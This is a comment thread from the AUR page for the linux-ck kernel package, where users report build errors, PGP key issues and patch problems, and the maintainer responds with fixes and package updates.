Functions A serverless function is a small, discrete, and reusable chunk of code that: - Is short-lived - Is not a daemon (long-running) - Does not publish TCP services - Is not stateful - Makes use of your existing services or third-party resources - Executes in a few seconds (based on AWS Lambda's default) We also need to make a distinction between serverless products from IaaS providers and open source software projects. On one hand, we have serverless products from IaaS providers such as Lambda, Google Cloud Functions, and Azure Functions. On the other hand, we have frameworks such as FaaS, which let an orchestration platform such as Docker Swarm or Kubernetes do the heavy lifting. Cloud Native — bring your favorite cluster. A serverless product from an IaaS vendor is completely managed so it offers a high degree of convenience and per-second/minute billing. On the flip-side, you are also very much tied into their release and support cycle. Open-source FaaS exists to promote diversity and offer choice. What's the Difference With FaaS? FaaS builds upon industry-standard Cloud Native technology: The FaaS stack The difference with the FaaS project is that any process can become a serverless function through the watchdog component and a Docker container. That means three things: - You can run code in whatever language you want - For however long you need - Wherever you want to Going Serverless shouldn't have to mean re-writing your code in another programming language. Just carry on using whatever your business and team needs. Example: For example, cat or sha512sum can be a function without any changes, since functions communicate through stdin/stdout. Windows functions are also supported through Docker CE. This is the primary difference between FaaS and the other open-source serverless frameworks which depend on bespoke runtimes for each supported language. Let's look at three of the big features that have come along since Dockercon, including CLI and function templating, Kubernetes support, and asynchronous processing. 1. The New CLI Easy Deployments I added a CLI to the FaaS project for making deploying functions easier and scriptable. Prior to this, you could use the API Gateway's UI or curl. The CLI allows functions to be defined in a YAML file and then be deployed to the API Gateway. Finnian Anderson wrote a great intro to the FaaS CLI on Practical Dev/dev.to Utility Script and Brew There is an installation script available, and John McCabe helped the project get a recipe on brew. $ brew install faas-cli or $ curl -sL | sudo sh Templating Templating in the CLI is where you only need to write a handler in your chosen programming language and the CLI will use a template to bundle it into a Docker container — with the FaaS magic handled for you. There are two templates provided for Python and Node.js, but you can create your own easily. There are three actions the CLI supports: -action build: creates Docker images locally from your templates -action push: pushes your templates to your desired registry or the Hub. -action deploy: deploys your FaaS functions If you have a single-node cluster, you don't need to push your images to deploy them. Here's an example of the CLI configuration file in YAML: provider: name: faas gateway: functions: url_ping: lang: python handler: ./sample/url_ping image: alexellis2/faas-urlping sample.yml Here is the bare minimum handler for a Python function: def handle(req): print(req) This is an example that pings a URL over HTTP for its status code: import requests def print_url(url): try: r = requests.get(url,timeout = 1) print(url +" => " + str(r.status_code)) except: print("Timed out trying to reach URL.") def handle(req): print_url(req) ./sample/url_ping/handler.py If you need additional pip modules, then also place a requirements.txt file alongside your handler.py file. $ faas-cli -action build -f ./sample.yml You'll then find a Docker image called alexellis2/faas-urlping, which you can push to DockerHub with -action push and deploy with -action deploy. You can find the CLI in its own repo. 2. Kubernetes Support As a Docker Captain, I focus primarily on learning and writing about Docker Swarm, but I have always been curious about Kubernetes. I started learning how to setup Kubernetes up on Linux and Mac and wrote three tutorials on it, which were well-received in the community. Architecting Kubernetes Support Once I had a good understanding of how to map Docker Swarm concepts over to Kubernetes, I wrote a technical prototype and managed to port all the code over in a few days. I opted to create a new microservice daemon to speak to Kubernetes rather than introducing additional dependencies to the main FaaS codebase. FaaS proxies the calls to the new daemon via a standard RESTful interface for operations such as: Deploy, List, Delete, Invoke, and Scale. Using this approach meant that the UI, the CLI, and auto-scaling all worked out the box without changes. The resulting microservice is being maintained in a new GitHub repository called FaaS-netes and is available on DockerHub. You can set it up on your cluster in around 60 seconds. Watch a Demo of Kubernetes Support In this demo, I deploy FaaS to an empty cluster, then run through how to use the UI, Prometheus and trigger auto-scaling too. But Wait... Aren't There Other Frameworks That Work on Kubernetes? There are probably two categories of Serverless frameworks for Kubernetes — those which rely on a highly specific runtime for each supported programming language and ones like FaaS, which let any container become a function. FaaS has bindings to the native API of Docker Swarm and Kubernetes, meaning it uses first-class objects that you are already used to managing such as Deployments and Services. This means there is less magic and code to decipher when you get into the nitty gritty of writing your new applications. A consideration when picking a framework is whether you want to contribute features or fixes. OpenWhisk, for instance, is written in Scala. Most of the others are written in Golang. 3. Asynchronous Processing One of the traits of a serverless function is that it's small and fast, typically completing synchronously within a few seconds. There are several reasons why you may want to process your function asynchronously: - It's an event and the caller doesn't need a result - It takes a long time to execute or initialize — i.e. TensorFlow/machine learning - You're ingesting a large number of requests as a batch job - You want to apply rate limiting I started a prototype for asynchronous processing via a distributed queue. The implementation uses the NATS Streaming project but could be extended to use Kafka or any other abstraction that looks like a queue. I have a Gist available for trying the asynchronous code out: What's Next? Thanks to the folks at Packet.net a new logo and website will be going live soon. Packet are automating the Internet and offer great value bare-metal infrastructure in the cloud. Speaking I'll be speaking on Serverless and FaaS at LinuxCon North America in September. Come and meet me there, and if you can't make it, follow me on Twitter @alexellisuk Please show support for FaaS and star the GitHub repository and share this blog post on Twitter. You can get started with the TestDrive over on GitHub: I'm most excited about the growing Kubernetes support and asynchronous processing. It would also be great to have someone take a look at running FaaS on top of Azure Container Instances. All Contributions Are Welcome Whether you want to help with issues, coding features, releasing the project, scripting, tests, benchmarking, documentation, updating samples, or even blogging about it, there is something for everyone, and it all helps keep the project moving forward. So if you have feedback, ideas, or suggestions then please post them to me @alexellisuk or via one of the GitHub repositories. Not sure where to start? Get inspired by the community talks and sample functions, including machine learning with TensorFlow, ASCII art, and easy integrations. Published at DZone with permission of Alex Ellis . See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/introducing-functions-as-a-service-faas?fromrel=true
CC-MAIN-2019-47
refinedweb
1,683
60.85
- Konstantin Scheglov Sorry, you are correct. You are missing the center region completly, which is required to position it at the south. The layout method is not doing anything without a center widget defined.Code: public class ImageViewer implements EntryPoint { public void onModuleLoad() { RootPanel rootPanel = RootPanel.get(); { NorthSouthContainer container = new NorthSouthContainer(); container.setBorders(true); rootPanel.add(container, 10, 10); container.setWidget(new HTML()); container.setSize("250px", "200px"); // "south" rendered on "north", not stretched horizontally container.setSouthWidget(new Button("SSSSSSSSSSSS")); } } } 1. Why I do this? Because I can. GXT 3 is about making things easier and safer, right? :-) 2. I've tried to add container after setting south widget. No difference. Screenshot_20120206_155833.jpgKonstantin Scheglov You should not write your code in a way that forces two layoutchains, as this will always end in being slow. Before adding something to the rootpanel, first build it completly. The good thing is that GXT alraedy caches multiple layout chains. However a NorthSouthContainer always requires the center region, please see the edited post. I updated the code to update atleast the width if no center region is specified, this change is in SVN now. However the south part will always be displayed under the center region. If there is no, than its under the north region. If that is also missing than its the top part. OK, thank you for help and fixes.Konstantin Scheglov The change will be in the next beta release.
https://www.sencha.com/forum/showthread.php?167924-Beta-1-NorthSouthContainer-behavior-different-from-TopBottomComponent-of-DP5/page2
CC-MAIN-2015-22
refinedweb
239
61.63
Adds a target field to EventBase so listeners can resolve source ID conflict between different behaviors. More... #include <TimerEvent.h> Adds a target field to EventBase so listeners can resolve source ID conflict between different behaviors. See EventRouter's class documentation for discussion of how to request and use timers. Definition at line 12 of file TimerEvent.h. List of all members.. Definition at line 23 of file TimerEvent.h. should return the minimum size needed if using binary format (i.e. not XML) Definition at line 25 of file TimerEvent.cc. 25 of file TimerEvent.h. true generates a description of the event with variable verbosity Definition at line 11 of file TimerEvent.cc. returns target Definition at line 27 of file TimerEvent.h. load from binary format Definition at line 36 of file TimerEvent.cc. load from XML format Definition at line 55 of file TimerEvent.cc. assignment operator, does a shallow copy (copies pointer value, doesn't try to clone target!) Definition at line 21 of file TimerEvent.h. save to binary format Definition at line 47 of file TimerEvent.cc. save to XML format Definition at line 81 of file TimerEvent.cc. assigns tgt to target Definition at line 28 of file TimerEvent.h. [static, protected] causes class type id to automatically be regsitered with EventBase's FamilyFactory (getTypeRegistry()) Definition at line 42 of file TimerEvent.h. Referenced by getClassTypeID(). [protected] indicates the listener for which the timer was created Definition at line 39 of file TimerEvent.h. Referenced by getBinSize(), getDescription(), getTarget(), loadBinaryBuffer(), loadXML(), operator=(), saveBinaryBuffer(), saveXML(), and setTarget().
http://tekkotsu.org/dox/classTimerEvent.html
CC-MAIN-2017-17
refinedweb
264
51.75
GKPath question - smartvipere75 I have a float2 struct that works perfectly: class float2(Structure): _fields_ = [('x',c_float),('y',c_float)]``` How can I implement this method of GKPath: - (instancetype)initWithPoints:(vector_float2 *)points count:(size_t)count radius:(float)radius cyclical:(BOOL)cyclical Specifically, the problem is when I pass array of float2 to points parameters, app crashes. Reference: GKPath initWithPoints:count:radius:cyclical: Can you post your code that is creating the array and calling the method? This worked for me from objc_util import * from ctypes import * from scene import * load_framework('Foundation') load_framework('GameplayKit') GKPath = ObjCClass('GKPath') class float2(Structure): _fields_ = [('x',c_float),('y',c_float)] def __repr__(self): return 'float2({},{})'.format(self.x,self.y) pts=(float2*5)() #array of 5 points pts[0]=float2(10,11) pts[1]=float2(20,21) pts[2]=float2(30,31) pts[3]=float2(40,41) pts[4]=float2(50,51) #for some reason, count needs to be count+1? path=GKPath.pathWithPoints_count_radius_cyclical_(pts,len(pts)+1 , 0.5,0,argtypes=[c_void_p, c_size_t, c_float, c_bool], restype=c_void_p) #on my 32bit ipad i have had trouble with the right way to read back a float2, the following gets x #ptx=path.pointAtIndex_(1,argtypes=[c_ulong],restype=c_float) #this just crashes: #ptx=path.pointAtIndex_(1,argtypes=[c_ulong],restype=float2) #maybe because objc_util is not using objc_msgSend_stret for custom restype? so this might work on 64bit #this works in 32 bit, but probably does not work on 64bit machines for i in range(5): #on my 32bit ipad i have had trouble with the right way to read back a float2, the following gets x #ptx=path.pointAtIndex_(i,argtypes=[c_ulong],restype=c_float) #this just crashes: #ptx=path.pointAtIndex_(i,argtypes=[c_ulong],restype=float2) #maybe because objc_util is not using objc_msgSend_stret for custom restype? so might work on 64bit #this works in 32 bit, but probably does not work on 64bit machines p=c_uint64(path.pointAtIndex_(i,argtypes=[c_ulong],restype=c_uint64)) pt=float2.from_address(addressof(p)) print(pt) Objc_util seems to have trouble with both of these methods, figuring out argtypes. @JonB Try adding an extra underscore at the end of the methods that take/return vector_float2s, and then use the float2struct. Last time that worked I think. nope, selector not found. I have not looked at the code, but i think this is just a problem with objc_util. There is special code for handling structure returns on 32 bit, my guess is that it uses the inferred restype, not the user passed one to make that decision. The encodings seem to be screwed up on some of these >>> path.pointAtIndex_.encoding b'12@0:4I8' seems to be missing the return type character! A separete issue: GKPath.pathWithPoints_count_radius_cyclical_.encoding b'@24@0:4^8L12f16c20' objc_util barfs on the ^8 when parsing argtypes(ignores it completely) Yeah, the part of Clang that generates encodings simply does not do vector types. When it sees one, it encodes it as an empty string, which makes it basically impossible to parse the encoding. I don't think this is something objc_utilcan support (and since method calls involving vectors require some manual work anyway, I don't think that's really an issue). Now that I think about it, it makes sense that the pathWithPoints...method doesn't have an "underscore" version. The vectors are only passed indirectly through a pointer, and not directly as a normal parameter. For direct vector parameters, the compiler seems to generate two methods - the regular one, which probably uses fancy vector registers, and the "underscored" one, which uses regular structs. For indirect parameters this isn't necessary - the vectors are passed by pointer, so they have to be in memory, and it's not possible to use vector registers for passing anyway. Can you check if there is a pointWithIndex__method with two underscores, and try to use that with a float2struct restype? >>> split_encoding('@24@0:4^8L12f16c20') ['@', '@', ':', '^L', 'f', 'c'] Knowing that clang doesn't properly represent vectors in the encoding, it seems like we could split on numbers appearing where they are not supposed to ... so ^8L should not be interpreted as ^L (pointer to unisgned long), but a pointer to something we are not sure of (c_void_p) followed by a long. vector restype is obviously a little trickier, especially since the size info never seems correct. I am on ios9, but there are no double underscore pointWithIndex or pointAtIndex. I think on 10 maybe it was replaced with float2AtIndex.
https://forum.omz-software.com/topic/4281/gkpath-question
CC-MAIN-2017-34
refinedweb
744
53.1
How to customize Fomantic UI with LESS and Webpack? (applicable to Semantic UI too) Introduction Ever heard about Fomantic UI? It is likely that you did not. It is community fork of the great UI library called Semantic UI, which unfortunately got a bit abandoned at the moment and some great folks made a fork and moving forward with work which is not limited to fixing bugs! Their intention is to merge back to the main repo as soon (and obviously IF) as the development starts again. Many people coming across FUI / SUI (I will be using these abbreviations in this article to not repeat myself with whole names every time. They obviously mean Fomantic UI / Semantic UI) quickly facing the issue with any customization and this is exactly what happened to me. My setup I am using FUI within my ReactJS app built on the great boilerplate from @rokoroku which is available here on Github. The key point is that I have separate webpack.config.jsso if you are using create-react-app you will probably have to eject before applying any of these. Let’s do it! Install required dependencies You have to install some dependencies: yarn add -D fomantic-ui-less less less-loader extract-text-webpack-plugin Make sure it installed less with version >=3.0.0 as sometimes it will install 2.* by default which will get you in the troubles. Configure Webpack to load LESS files Open your webpack.config.jsand add the following parts: Create a folder with the skeleton of your customization On the root level of your project (same as src or node_modules ) create the folder called semantic-ui (or whatever, but remember to change it in aliases). Go to: and download: _sitefolder, theme.config.examplefile, themesfolder. Put all of them inside created folder. Remove underscore from _site and .examplefrom theme.config . theme.config This file is mostly prepared but you have to change some details: /* Path to theme packages */ @themesFolder : 'themes'; /* Path to site override folder */ @siteFolder : '../semantic-ui/site'; /******************************* Import Theme *******************************/ @import (multiple) "~fomantic-ui-less/theme.less"; @fontPath : "../../../themes/@{theme}/assets/fonts"; /* End Config */ Last but not least: import main LESS file You have to import semantic.less file in your entry file. import 'fomantic-ui-less/semantic.less'; It is working now! You can now go e.g. to semantic-ui/site/globals/site.variables and add: @primaryColor: #002f4e; @pageBackground: #eff0f1; which will change your primary color and background color of the <body>. That’s it That is all that you need to do. Remember that after completing all steps you have to restart your Webpack because you made changes to your config which will not hot-reload. Credits Part of this was based on the great article from Aggelos Arvanitakis which you can find here: . I had to make some research and find some fixes because it was written for Webpack 2 with SUI and also some things like readme in SUI LESS repo have been removed etc so it is not that easy to get it working. I hope this article will help you guys with customization of the FUI/SUI using LESS.
https://marekurbanowicz.medium.com/how-to-customize-fomantic-ui-with-less-and-webpack-applicable-to-semantic-ui-too-fbf98a74506c
CC-MAIN-2021-43
refinedweb
528
64.1
@nTia89 It had to be from my side, it's working fine now with 4.14.20. Search Criteria Package Base Details: linux-ck Packages (2) Latest Comments garwol commented on 2018-02-17 17:34 Terence commented on 2018-02-17 16:50 nTia89 commented on 2018-02-15 22:02 no problem here with .19 and DKMS Terence commented on 2018-02-13 20:34 Something with 4.14.19 is making DKMS not working for any driver. kata198 commented on 2018-02-08 05:03 @QuartzDragon - I applied the 4.14 patch with -F5 (fuzz-level 5, dangerous; requires manual review of every patch but "shoves" things in when at all possible. It even managed to shove some code right into the middle of a comment!), fixed the rejections, added one or two new compat functions as required due to API/ABI changes between .14 and .15, did some basic research into where things moved around and such and applied those changes. I've done some kernel work in the past, so I like to think I'm somewhat familiar with the layout of things. It shouldn't take too long for you to pick up where things are, thanks to you're friendly General Regular Expression Parser (grep) . Basically, checked the diff between 4.14 and 4.15 on the core scheduler to see any abi/api changes, and others as they arose ( I remember there being a change in some of the "compat" files which required updates/additions/rewrites beyond what the original patch provided, there may have been others ). Then just built, and fixed any issues that arise during compile (these can be due to changing where #ifdef wrappers are in the baseline, where the patch may force things into the wrong section, or a linker issue from a missing function, etc.) I'd say just dive right in! Try to merge 4.14 to 4.15 yourself, basically make it till you break it, or succeed! Probably a good idea to use a virtualbox image for testing rather than your primary system, or what I do on this laptop I am using to type to you right now, which is running arch in a virtualbox on top of windows 10 (work / warrenty reasons) is this: I take a snapshot prior to development, so any damage that gets done I can just roll back and alls good. Hope this helps, I'm not too sure on what you are looking for specifically, so I tried to keep it general! I would say just dig in! Try you m kata198 commented on 2018-02-08 04:46 I mentioned specifically that I didn't know if they were true or not -- I just found a couple articles when searching to see if anyone else had ported it as it was time for me to build a new kernel. I mean no disrespect nor harm toward anybody. @beojan is probably right -- they may have been dated 2007 which I mistook for 2017. If you've spoken with him and he says he's not -- all the better. But please don't try to make me out to be some sort of demon spreading nonsense -- I specifically said "I don't know if these reports are legitimate or not." You're free to enjoy the early merge and update I did, or you're free to wait for him to release an official version. I'm still running strong without any issues on my merge, so it seems pretty stable to me. Again, I apoligize if I've upset anybody, this was not my intent at all. beojan commented on 2018-02-06 11:48 @kata198 I wonder if the "rumours" you're hearing are really old news from when he stopped maintaining the old ck patchset in 2007. graysky commented on 2018-02-04 11:20 @kata198- While I applause your efforts to help port the ck patchset, announcing uncited and unconfirmed rumors as pretext is not cool. CK himself replied to me in a private email: Yeah bullshit. It'll probably be a week or so though. Cheers, Con On 4 February 2018 at 22:06, John <graysky AT archlinux DOT us> wrote: > > > Specifically: "Hey guys, so I've read some rumors that Con Kolivas is taking > a break / no longer maintaining the ck patchset; that 4.14 was the last > version for a while. " QuartzDragon commented on 2018-02-04 04:35 @kata198 Where did you hear about these rumours? I'm curious as to why he'd stop maintaining the patchset without notifying everyone, and passing the reins onto someone capable. Also, out of curiousity, how did you rebase the patches? I'm curious about learning how to do rebasing, myself. kata198 commented on 2018-02-04 02:23 Linux-4.15 (Unofficial) Hey guys, I've heard rumros that Con Kolivas may no longer be maintaining the ck patchset? I don't know if these reports are legitimate or not, but just in case they are, I went ahead and manually updated the ck patchset to cleanly apply with 4.15. It's been a little bit of time since I've done any sort of active kernel development, but I believe everything is correct here, and I've been running this ported patchset (ported patch-4.14-ck1.xz to work with linux-4.15) for almost 2 full days now without even the slightestnd ev indication of issue, I'm running on an intel i7 in SMP/SMT mode, through virtualbox as my primary laptop/desktop. I'm posting to share my unofficial merge of the patchset, in the hopes that it may be of benefit to others. You can find the patch and even a drop-in replacement of the PKGBUILD on stock arch-4.15 package, HERE: Enjoy! Plexcon commented on 2018-02-02 20:56 drivers/gpu/drm/amd/amdgpu/.tmp_uvd_v7_0.o: warning: objtool: uvd_v7_0_ring_emit_fence()+0x45a: return with modified stack frame CC [M] drivers/gpu/drm/amd/amdgpu/amdgpu_vce.o /bin/sh: línea 1: 27516 Violación de segmento (`core' generado) ./tools/objtool/objtool orc generate --no-fp "drivers/gpu/drm/amd/amdgpu/.tmp_amdgpu_vce.o" make[4]: [scripts/Makefile.build:321: drivers/gpu/drm/amd/amdgpu/amdgpu_vce.o] Error 139 make[3]: [scripts/Makefile.build:579: drivers/gpu/drm/amd/amdgpu] Error 2 make[2]: [scripts/Makefile.build:579: drivers/gpu/drm] Error 2 make[1]: [scripts/Makefile.build:579: drivers/gpu] Error 2 make: *** [Makefile:1032: drivers] Error 2 ==> ERROR: Se produjo un fallo en build(). Cancelando... Plexcon commented on 2018-02-02 19:33 /bin/sh: línea 1: 5200 Violación de segmento (`core' generado) ./tools/objtool/objtool orc generate --no-fp "drivers/infiniband/hw/mlx4/.tmp_mcg.o" make[4]: [scripts/Makefile.build:321: drivers/infiniband/hw/mlx4/mcg.o] Error 139 make[3]: [scripts/Makefile.build:579: drivers/infiniband/hw/mlx4] Error 2 make[2]: [scripts/Makefile.build:579: drivers/infiniband/hw] Error 2 make[1]: [scripts/Makefile.build:579: drivers/infiniband] Error 2 make: *** [Makefile:1032: drivers] Error 2 ==> ERROR: Se produjo un fallo en build(). Cancelando... Plexcon commented on 2018-02-02 18:17 ==> Verificando las firmas de las fuentes con gpg... linux-4.14.tar ... HA FALLADO (clave pública desconocida 79BE3E4300411886) patch-4.14.16 ... HA FALLADO (clave pública desconocida 38DBBDC86092693E) ==> ERROR: ¡No se ha podido verificar alguna de las firmas PGP! sudo pacman-key --recv 38DBBDC86092693E sudo pacman-key --recv 79BE3E4300411886 niklaszantner commented on 2018-01-31 22:22 @AriseEVE ==> Verifying source file signatures with gpg... linux-4.14.tar ... Passed patch-4.14.16 ... Passed Works for me. I assume that you have to add the keys to your system (looks like you are missing Linus' and Greg's key) Following commands should help: gpg --recv-key 79BE3E4300411886<br> gpg --recv-key 38DBBDC86092693E AriseEVE commented on 2018-01-31 22:06 ==> Verifying source file signatures with gpg... linux-4.14.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.14.16 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! <br> ==> ERROR: Makepkg was unable to build linux-ck. Unable to build, key check failed. graysky commented on 2018-01-29 21:49 @Mthw - Not out-of-date for the same reason as graysky commented on 2018-01-29 09:52 Morganamilo commented on 2018-01-29 11:02 Ah my bad. Wasn't thinking about the patches. graysky commented on 2018-01-29 09:52 @morganamilo-not out of date until ck1 for 4.15.x is released. AstroProfundis commented on 2018-01-26 08:26 4.14.15-2 works for me as well, thanks bratpilz commented on 2018-01-26 01:25 linux-ck-4.14.15-2 builds successfully for me. Thanks for the patch! graysky commented on 2018-01-26 00:03 I included a patch from loqs that should fix the build error in 4.14.15-2. Please test and give some feedback. AstroProfundis commented on 2018-01-25 05:53 I tried to disable CONFIG_SCHED_MUQSS in defconfig (and regenerated the config file thus enabled FAIR_GROUP_SCHED and CFS_BANDWIDTH automatically), the build was success without error. Hope this info helps. vp1981 commented on 2018-01-25 01:09 Hello, just for the record: and corresponding commit is in 4.14.15. I'm not familiar with MuQSS source but hope that the fix is simple enough and CK make new ck2. sir_lucjan commented on 2018-01-24 19:55 I tried to compile linux-ck but I had the same error. sir_lucjan commented on 2018-01-24 19:51 Look, I think there's been a misunderstanding. Error seems related to ck-patchset/muqss. I don't use muqss / ck patchset. Sources 4.14.15 build fine without errors. sir_lucjan commented on 2018-01-24 19:50 Look, I think there's been a misunderstanding. Error seems related to ck-patchset/muqss. I don't use muqss / ck patchset. Sources 4.14.15 build fine without errors. graysky commented on 2018-01-24 19:44 Yes but without MuQSS. Works fine. Seems related to ck-patchset. ...without MuQSS? So if you apply all the patches in the broken out ck1 except for 0001-MuQSS-version-0.162-CPU-scheduler.patch you are able to build without error? sir_lucjan commented on 2018-01-24 15:48 @graysky Yes but without MuQSS. Works fine. Seems related to ck-patchset. graysky commented on 2018-01-24 15:35 @sir_l - you compiled 4.14.15-1 without errors? Looks like you're building a differently named kernel. What are the differences vs linux-ck? sir_lucjan commented on 2018-01-23 22:21 @graysky Yes, seems related to MuQSS. I've compiled without errors: Linux version 4.14.15-0.4-bfq-sq-mq-haswell-git (lucjan@archlinux) (gcc version 7.2.1 20171224 (GCC)) #1 SMP PREEMPT Mon Jan 22 17:03:42 CET 2018 Linux archlinux 4.14.15-0.4-bfq-sq-mq-haswell-git #1 SMP PREEMPT Mon Jan 22 17:03:42 CET 2018 x86_64 GNU/Linux (stable-rc version) graysky commented on 2018-01-23 22:19 @sir_l - Seems related to MuQSS. CK has been emailed. Full log: Clipped log: kernel/sched/MuQSS.c: In function ‘try_to_wake_up’: kernel/sched/MuQSS.c:1962) ^~~~~~~~~~~~~~~~~~~ kernel/sched/MuQSS.c: In function ‘try_to_wake_up_local’: kernel/sched/MuQSS.c:2025) ^~~~~~~~~~~~~~~~~~~ CC [M] sound/drivers/vx/vx_pcm.o CC [M] net/8021q/vlanproc.o make[2]: *** [scripts/Makefile.build:320: kernel/sched/MuQSS.o] Error 1 make[1]: *** [scripts/Makefile.build:579: kernel/sched] Error 2 make: *** [Makefile:1032: kernel] Error 2 sir_lucjan commented on 2018-01-23 21:59 @graysky Could you paste a log? graysky commented on 2018-01-23 21:57 All - It seems that 4.14.15-1 is erroring out on the build for me. Need to dig into it further to see why. graysky commented on 2018-01-23 21:39 @sir_lucjan - Thanks. I removed it but since it's harmless, I won't push a -2 release... it can be effective on the next version. sir_lucjan commented on 2018-01-23 21:28 "chmod +x tools/objtool/sync-check.sh" is not needed anymore. graysky commented on 2018-01-21 12:56 could you please append 'make clean' and 'rm -fr Documentation' after 'make mrproper'? 'rm -fr Documentation' saves >2Gbytes on tmpfs and can avoid 'No space left on device' error which happens in low-ram PC. @enihcam - The make clean would be redundant and I show linux-4.14/Documentation as being only 38M, not 2G. zerophase commented on 2018-01-18 00:21 @QuartzDragon Thanks got it working. I was zcatting config over too early in prepare earlier. (might have been missing switching Retpoline on) For some reason running zcat too early in prepare turns every module on. QuartzDragon commented on 2018-01-17 23:55 @graysky @zerophase The Retpoline patches for Spectre got backported to the current 4.14.14 release, not before. The Memory Page Isolation patches for Meltdown were earlier, though, yeah. graysky commented on 2018-01-17 22:57 @zerophase - Yes, since version 4.14.11-1 I believe. zerophase commented on 2018-01-16 21:29 I tried the whole zcat /proc/config.gz > ./.config. It seems to work fine, but it looks like more modules are turned on, and the kernel ballooned up by 51.66 MiBs for me. Did anyone else notice the kernel get larger? Are the Spectre and Meltdown protections turned on by default? cokomoko commented on 2018-01-12 20:28 @graysky No, I do not change anything. But I use the system in Turkish. Could it be a problem? graysky commented on 2018-01-12 20:18 @cokomoko - Builds find for me. Are you modifying anything when building? @gustawho - Yes. gustawho commented on 2018-01-12 19:34 Does/will this build include any patches to address Meltdown and/or Spectre? cokomoko commented on 2018-01-12 19:28? enihcam commented on 2018-01-11 04:47. zerophase commented on 2018-01-11 04:00 I wouldn't mind a solution for config_current either. I can't always remember what I turned on in the kernel every time. QuartzDragon commented on 2018-01-11 03:21 @enihcam You can always just keep config.last aside, or just zcat /proc/config.gz manually if you really need to. enihcam commented on 2018-01-11 01:51 @graysky, is there any alternative solutions to using '_use_current'? I have many specialized devices running linux-ck, removal of _use_current causes a lot of troubles in maintaining the kernels. Lessaj commented on 2018-01-09 01:26 As long as it stops to ask you for any CONFIG that it's missing it's good to keep. It used to stop to ask, I think what's preventing it is: yes "" | make config >/dev/null graysky commented on 2018-01-07 20:12 ...I'm beginning to wonder if the _use_current variable is more trouble than it's worth Lessaj commented on 2018-01-07 19:16 Tjuh commented on 2018-01-07 16:48 Same issue as eugen-b when enabling config_audit=y in the config file. Haven't been able to compile since version 4.14.6-2. eugen-b commented on 2018-01-07 16:21 Saren commented on 2018-01-07 04:36 @graysky Thanks for making the toggle back. graysky commented on 2018-01-06 12:24 @presianbg - My bad. Fixed in 4.14.12-3. @saren - Yes, some recent benchmarking I did on a dual quad showed a pretty big hit so I reasoned that 99+% of users want it disabled. I reenabled the variable toggle. presianbg commented on 2018-01-06 09:47 Hi, happy 2018! Wish you all the best! bfq-sq is missing again... what is going on :? Saren commented on 2018-01-06 03:45 Hi there. Since 2315c7af5630 does that mean I will have to comment out the NUMA disabled code everytime? Thanks. tosto commented on 2018-01-05 18:01 @sl13kp Disabilita le notifiche, dovresti trovare un link in alto a destra nel riquadro "Package Actions" (e per favore evita di spammare nei commenti). sl13kp commented on 2017-12-31 00:12 avete scocciato con le notifiche non mi interessa questo programma QuartzDragon commented on 2017-12-28 09:49 @kurwall Try deleting your old build files, because the patch applies perfectly fine for me. If you're not using TMPFS for your builds, then your old build files will stick around, causing you issues if you don't delete them every now and then. kurwall commented on 2017-12-28 01:46 The GCC patch needs to be redone, as currently it is not applying properly air-g4p commented on 2017-12-19 09:58 graysky commented on 2017-12-18 20:10 @air-g4p - You need to assign a value to the _subarch variable (line 38) before you try building. air-g4p commented on 2017-12-18 15:55 oops: my missing (below) linux-ck 4.14.7-1 build failure link is here: air-g4p commented on 2017-12-18 15:52 graysky commented on 2017-12-18 12:22 @artafinde - good idea. sir_lucjan commented on 2017-12-18 11:29 artafinde commented on 2017-12-18 07:58 @graysky I suggest for now to delete the 24 option (line #38) on the PKGBUILD. If a user wants native detection let him go through makepkg. foi commented on 2017-12-18 06:16. air-g4p commented on 2017-12-18 05:41 Hi graysky, Thank you very much for attention and extremely quick correction of this issue. Highly impressive, indeed! When I get a chance, I'll try a re-build with the current release, and let you how things went. All the best, air|g4p graysky commented on 2017-12-17 23:33 . artafinde commented on 2017-12-17 23:23 @graysky: if you choose 24 (native) then you are asked again for P6_NOPS which fails to auto-configure with "yes" Support for P6_NOPs on Intel chips (X86_P6_NOP) [N/y/?] (NEW) graysky commented on 2017-12-17 09:56 @air-g4p - Yes, the failure is due to user intervention being required to select a sub-arch. Please try 4.14.16-3 in which the _subarch variable should take care of this use case. air-g4p commented on 2017-12-17 06:21 eduardoeae commented on 2017-12-16 12:48 Works OK now. Thanks! graysky commented on 2017-12-16 11:36 @edu and sha - Please try now. Shaikh commented on 2017-12-16 08:03 I encountered the same problem as @eduardoeae. eduardoeae commented on 2017-12-16 03:17. pedrogabriel commented on 2017-11-26 22:29 You plan to include the new runqueue patch? johnnybegood commented on 2017-11-25 17:44 Thanks a lot for the ck patches for bfq-sq!!! :) Osleg commented on 2017-11-25 16:21 Kernel panic solved, was unrelated to kernel itself Osleg commented on 2017-11-25 13:44 Also this since upgrade to >4.14 Kernel panic with "No working init found" Any idea what could be the cause? Osleg commented on 2017-11-25 13:38? graysky commented on 2017-11-25 13:05 No idea how yaourt works but if it is running the build function twice, the author of it should be notified as that is wasteful. Are you sure that it isn't just building once, and packaging the kernel then headers? That is how makepkg does it. Osleg commented on 2017-11-25 12:36 ? sir_lucjan commented on 2017-11-23 19:40 @Osleg Could you tell us what do you mean? Osleg commented on 2017-11-23 19:37 I wonder what is the difference between this pkg and linux-ck as their PKGBUILDs are identical Terence commented on 2017-11-23 15:05 . QuartzDragon commented on 2017-11-23 10:03 Attention @graysky and @everyone: Urgently needed update! FS#56404 - [linux] Using bcache will destroy filesystems (4.14.X) ~ and: 4.14.1-2 patch ~ I've already updated manually for this. Terence commented on 2017-11-22 23:11 . artafinde commented on 2017-11-22 18:05 . Terence commented on 2017-11-22 17:42 . artafinde commented on 2017-11-22 17:38 Open the modprobed-db database (it's a file) and remove them from the list. Terence commented on 2017-11-22 17:30 @artafinde @graysky Thanks but I knew that, that's why they are built using dkms and I took care of blacklisting all of them, making sure they are not appearing in the modprobe-db file, but problem persists. artafinde commented on 2017-11-22 17:25 @Terence: The nvidia is external same as virtualbox modules. If you have dkms packages it should trigger a build after you install (provided you have headers). modprobed-db should probably exclude them with IGNORE list - see wiki. graysky commented on 2017-11-22 17:19 @Terence - These are either provided by some other package or not included in the kernel anymore. See man modprobed-db. Terence commented on 2017-11-22 17:10? sir_lucjan commented on 2017-11-21 21:04 @johnnybegood I also recommended blk-mq patches. johnnybegood commented on 2017-11-21 20:55! zebulon commented on 2017-11-21 12:07. graysky commented on 2017-11-20 21:37. silvik 